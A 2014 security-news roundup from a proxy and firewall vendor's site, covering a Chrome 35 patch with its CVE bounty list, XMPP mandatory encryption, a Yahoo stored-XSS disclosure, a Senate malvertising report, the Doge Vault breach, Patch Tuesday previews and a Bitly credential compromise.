Protect your corporate IT network from hackers and other unwanted intruders with Proxy Sentinel™. Click here for all the details and get the peace of mind you deserve.
Back to our Homepage Proxy Sentinel™ high performance Internet proxy server and secure firewall solution Firewall Sentinel™ secure & powerful Internet firewall solution About Internet and GCIS Frequently Asked Questions on Internet security issues Internet Security Industry News - Stay informed of what's happening Contact Internet today and order your Proxy Sentinel™ or Firewall Sentinel™ server now!

Google patched 23 security vulnerabilities in its Chrome browser

If you need reliability when it comes to SMTP servers, get the best, get Port 587.

Get a powerful Linux Dual-Core dedicated server for less than $2.67 a day!

Share on Twitter.

May 21, 2014

Click here to order the best dedicated server and at a great price.

Google says it has patched no less than 23 security vulnerabilities in its popular Chrome browser, including three marked high risk, in its latest update of the product.

The company has yet to release specific details on the full set of patched bugs pushed out overnight in the new release dubbed 35 of Chrome for Windows, Mac and Linux.

Google Chrome engineer Karen Grunberg said it paid out $9,500 to external researchers for reporting security vulnerabilities including use-after-free and cross site scripting.

The latest Chrome version also features improved developer control over touch input, newer JavaScript features and APIs for mobile apps and their extensions.

A particularly interesting bug in the set was discovered in April. It allowed abuse of the old speech API in Chrome for eavesdropping.

Bug payouts Google acknowledged in the patch include:

  • $3000 for 356653 – High – CVE-2014-1743: Use-after-free in styles.
  • $3000 for 359454 – High – CVE-2014-1744: Integer overflow in audio.
  • $1000 for 346192 – High – CVE-2014-1745: Use-after-free in SVG.
  • $1000 for 364065 – Medium – CVE-2014-1746: Out-of-bounds read in media filters.
  • $1000 for 330663 – Medium – CVE-2014-1747: UXSS with local MHTML file.
  • $500 for 331168 – Medium – CVE-2014-1748: UI spoofing with scrollbar.
  • In a tip to would-be bug hunters, Grunberg said that many of the noted security vulnerabilities were detected using its AddressSanitizer tool released in 2012.

    In other internet security news

    A whole slew of instant messaging service providers will begin refusing unencrypted connections starting today under several requests to harden the extensible messaging and presence protocol (XMPP).

    Two years ago, developers requested testing client-to-server and server-to-server encryption for XMPP as of January 2014 as an initial step to secure and improve the communications protocol against crimnals and government spies.

    The XMPP Standard Foundation initiative covered no less than seventy service providers but could not be enforced.

    Peter Saint-André, the technologist behind the initiative, welcomed the go live date. "Today, a large number of services on the public XMPP network permanently turned on mandatory encryption for client-to-server and server-to-server connections," Saint-André said.

    "This is the first step toward making the XMPP network more secure for all users," he added. Signatory company Prosodical said the non-binding request was a necessary precondition to other security improvements as well.

    "While XMPP is an open distributed network, obviously no single entity can mandate encryption for the whole network, but as a group, we are moving in the right direction," the company said in a blog post.

    "This commitment to encrypted connections is only the first step toward more secure communications using XMPP, and does not obviate the need for technologies supporting end-to-end encryption such as Off-the-Record Messaging, strong authentication, channel binding, secure DNS, server identity checking, and secure service delegation," he said.

    But overall, the upgrade would be sufficient to beat passive eavesdropping and followed moves by the boarder tech industry to lock down communications and move away from the CA model in the wake of the National Security Agency snooping disclosures.

    The similar 'Reset the Net' iniative was launched by a coalition of privacy pundits to push out SSL, end-to-end encryption technology, perfect forward secrecy and HTTP strict transport security across the internet.

    In other internet-security news

    Yahoo said this morning that it has patched a cross site scripting (XSS) security flaw in the commenting system it uses across most of its websites.

    Yahoo supressed two attack vectors affecting a long list of services covering topics as diverse as shopping and sport two weeks after they were reported on May 2nd.

    California web deveveloper and security researcher Behrouz Sadeghipour said that attackers could steal Yahoo users session cookies and tokens by injecting some code into the comment system.

    In a public disclosure, he said the attack could have been used with bot servers to compromise users in a more distributed manner.

    "The websites will store the string and present it to anyone visiting the post containing the comment," Sadeghipour said.

    "So with a sample bot we could post a comment containing malicious code to hijack the visitors' session cookie.

    "We could also simply target a specific user by linking it to a post containing a comment with a malicious code by the attacker," he added.

    All Yahoo top level domains were affected by the stored XSS attacks placing thousands of daily commenters at risk.

    Sadeghipour also revealed a less dangerous self-XSS which could also be placed in the comments section and engineered in a way to target users by appearing under the 'most recent' or 'most discussed' fields.

    Overall, cross site scripting flaws littered the internet and could cause varying degrees of damage. At its most severe, users can be served malware or have accounts compromised.

    System admins should consult OWASP for guidance to remove the security vulnerabilities from their websites.

    In other internet security news

    Earlier this morning, the U.S. Senate has issued a report calling for the online advertising industry to greatly improve its security against malware attacks, and for lawmakers to legislate tougher penalties should the industry fail to do so.

    The Committee on Homeland Security and Governmental Affairs said that the advertising landscape as it now exists makes it impossible for users to be protected against malware attacks while visiting websites.

    "The online advertising industry has grown in complexity to such an extent that each party can conceivably claim that it's simply not responsible when malware is delivered to a user's computer through an advertisement," the steering committee said in its report.

    "An ordinary online advertisement typically goes through five or six intermediaries before being delivered to a user's browser, and the ad networks themselves rarely deliver the actual advertisement from their own servers," the report said.

    The analyzis, which is the result of a subcommittee investigation of malware incidents such as the recent attack on Yahoo, concludes that the advertising sector is unable to police itself with current standards.

    As such, it will require heightened efforts from industry bodies to impose security standards and develop networks to share information on cyber threats and incidents, the report concludes.

    Additionally, the committee believes that ad networks should implement "circuit breaker" protections in which site administrators or network operators can check and disable ads containing malware code at various points in the ad-serving process.

    Should the industry fail to put the needed protections in place, the senators recommend that stronger laws be written and additional powers granted to regulatory agencies.

    "Self-regulatory bodies should endeavor to develop comprehensive security guidelines for preventing online advertising malware attacks," the committee said.

    "In the absence of effective self-regulation, the FTC should consider issuing comprehensive regulations to prohibit deceptive and unfair online advertising practices that facilitate or fail to take reasonable steps to prevent malware, invasive cookies, and inappropriate data collection delivered to Internet consumers through online advertisements."

    The steering committee is planning to follow up the report with a hearing later today.

    In other internet security news, a website that supposedly holds the cryptocurrency Dogecoin in conditions of optimal security, has gone offline.

    The site now publishes the following message-- ``Notice: We apologise for the downtime, a press release will be posted here within 24 hours. Please do not transfer any funds to Dogevault addresses while our investigation is under way. Email for any enquiries.``

    Then, at 8.27 AM EST the following message was posted-- ``Announcement: On May 11, 2014, the Doge Vault online wallet service was compromised by attackers, resulting in a service disruption and tampering with wallet funds. As soon as the administrator of Doge Vault was alerted, the service was halted.``

    ``The attackers had already accessed and destroyed all data on the hosted virtual machines. We are currently in the process of identifying the extent of the attack and potential impact on user's funds.``

    ``This involves salvaging existing wallet data from an off-site backup. We will also closely be investigating potential attack vectors, and determining the security breach which enabled the attacker's to compromise the service in the first place.``

    ``Please do not transfer any funds to Doge Vault addresses while our investigation is under way. Thank you for your patience-- we will issue an additional statement including our findings and plan of action within the next 24-48 hours. Email for any enquiries. Doge Vault.``

    After Bitcoin's Mt. Gox went bankrupt not so long ago, now some observers are wondering if the same fate could happen to Dogecoin. And you can't blame them for thinking along those lines.

    Speculation is rife in posts like a Reddit missive that the site was hacked, taking with it at least 950,000 Dogecoins. Another report suggests up to 111 million Dogecoins seem to have mysteriously appeared in a “mega wallet” linked to Dogevault.

    With the Dogecoin to the US dollar exchange rate running at about 1000:$0.46, that's about $51,000 hardly the millions suspected to have evaporated from Bitcoin exchange Mt Gox but still a nasty lot of cryptocash to lose, nevertheless.

    If Dogevault has indeed been fatally compromised it will make it harder to sustain cryptocurrency enthusiasm. Whatever the upsides of the concept, security of some participants clearly needs to be tightened, and in a very big way.

    Microsoft's security department said yesterday it will release no less than eight security updates next Patch Tuesday to stop remote-code execution bugs in Windows and Internet Explorer, among other various security bugs.

    Meanwhile, Adobe will issue new versions of Acrobat and Reader for this month's Patch Tuesday as well, so May 13 will be a busy day for system admins and IT departments everywhere.

    Two of the security updates from Microsoft are rated as very critical because they allow miscreants to execute code from vulnerable systems from afar-- the Windows operating system from Server 2003 to Windows 8, web browser Internet Explorer 6 to 11, and some SharePoint-related software, are all at risk, Microsoft warns.

    The other six updates are labelled important-– one is a remote-code execution hole, four lead to privilege escalation and one allows hackers to bypass security protections altogether.

    The affected software includes Microsoft Office 2007 to 2013, Windows and the .NET Framework.

    As is always the case, Microsoft holds off documenting the security vulnerabilities in further detail prior to the patch release for obvious reasons.

    The May 13 security release will be the first in more than 10 years to not include any bulletins for Windows XP.

    The outdated operating system was officially retired from support by Microsoft on April 8, though subsequent exploitation of flaws in the OS by miscreants has forced the company to issue an out-of-band update, nevertheless.

    Adobe, meanwhile, will issue an update for four versions of its Reader and Acrobat software. The Adobe fix will address critical security flaws in both the Windows and OS X versions of Reader and Acrobat 10 and 11.

    Users and system administrators are well advised to test and deploy all of next Tuesday's security patches as soon as possible or risk falling victims to exploits targeting the newly disclosed security vulnerabilities.

    In other internet security news

    Online marketing and URL-shortening firm has warned its users that its system has been hacked into by unknown parties and then urged that its users change their passwords as soon as possible.

    In a security advisory, the company says-- "We have strong reasons to believe that Bitly account credentials have been seriously compromised but that we have no indication at this time that any accounts have been accessed without permission."

    The company also promises that it has "already taken proactive measures to secure all paths that led to the compromise in the first place, and then ensure the security of all account credentials going forward."

    However, don't get too comfortable. strongly encourages its users to employ OAuth to link their accounts with Facebook and Twitter.

    As an additional layer of safety, the firm has severed those links to stop account hijacking and to help prevent another potential attack.

    Get a powerful Linux Dual-Core dedicated server for less than $2.67 a day!

    Share on Twitter.

    Source: Google.

    Click here to order the best dedicated server and at a great price.

    Save Internet's URL to the list of your favorite web sites in your Web browser by clicking here.

    You can link to the Internet Security web site as much as you like.

    Home | Proxy Sentinel™ | Firewall Sentinel™ | FAQ | News | Sitemap | Contact
    Copyright © Internet    Terms of use    Privacy agreement    Legal disclaimer

    Click here to order our special clearance dedicated servers.

    Get your Linux or Windows dedicated server today.

    Click here to order our special clearance dedicated servers.